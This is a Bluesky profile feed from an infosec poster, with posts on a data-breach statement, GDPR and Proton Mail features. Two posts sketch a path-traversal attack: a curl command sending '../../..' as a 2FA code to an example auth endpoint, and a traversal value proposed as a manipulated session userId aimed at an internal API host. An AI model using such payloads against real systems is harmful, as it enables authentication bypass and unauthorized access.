Pasi Orovuo
@pasi.bsky.social
Infosec person. Mostly building and breaking cloud stuff.
Silly me, it's even simpler. `curl -X POST -H 'Content-Type: application/json' --data '{"code": "../../.."}' 'https://example[.]com/api/auth/2fa'`
November 4, 2025 at 4:00 PM
Silly me, it's even simpler. `curl -X POST -H 'Content-Type: application/json' --data '{"code": "../../.."}' 'https://example[.]com/api/auth/2fa'`
`../..?x=` as the session.userId assuming it can be manipulated and api-v1-prod.example.local returns 200 at the root. /health could be another good candidate.
October 31, 2025 at 2:40 AM
`../..?x=` as the session.userId assuming it can be manipulated and api-v1-prod.example.local returns 200 at the root. /health could be another good candidate.
I wish the note would end with "Thank you for your attention to this matter"
September 3, 2025 at 3:38 AM
I wish the note would end with "Thank you for your attention to this matter"
Hieno veto ja tyylikäs lopputulos verrattuna siihen, että kamat roskiin ja uutta kiinalaatua sisään.
May 24, 2025 at 1:15 PM
Hieno veto ja tyylikäs lopputulos verrattuna siihen, että kamat roskiin ja uutta kiinalaatua sisään.
Reposted by Pasi Orovuo
🎭 Now you can create hide-my-email aliases directly in the #ProtonMail web app: proton.me/blog/hide-my...
🖥️ The Proton Mail #macOS & #Windows apps have been released, with the #Linux app becoming available in beta: proton.me/blog/proton-...
2 / 4
🖥️ The Proton Mail #macOS & #Windows apps have been released, with the #Linux app becoming available in beta: proton.me/blog/proton-...
2 / 4
Protect your identity with hide-my-email aliases in Proton Mail | Proton
With hide-my-email aliases, you can keep your email address private, avoid data breaches and prevent phishing or spam emails.
proton.me
April 5, 2024 at 10:36 AM
🎭 Now you can create hide-my-email aliases directly in the #ProtonMail web app: proton.me/blog/hide-my...
🖥️ The Proton Mail #macOS & #Windows apps have been released, with the #Linux app becoming available in beta: proton.me/blog/proton-...
2 / 4
🖥️ The Proton Mail #macOS & #Windows apps have been released, with the #Linux app becoming available in beta: proton.me/blog/proton-...
2 / 4
Fully agree, and should've elaborated earlier. They're effectively using regulative terminology to downplay the impact of the breach. Information leaked in the breach could subject affected people identity theft at worst.
December 18, 2023 at 9:24 AM
Fully agree, and should've elaborated earlier. They're effectively using regulative terminology to downplay the impact of the breach. Information leaked in the breach could subject affected people identity theft at worst.
I believe they are referring to GDPR definition of sensitive data in the statement
December 15, 2023 at 3:39 PM
I believe they are referring to GDPR definition of sensitive data in the statement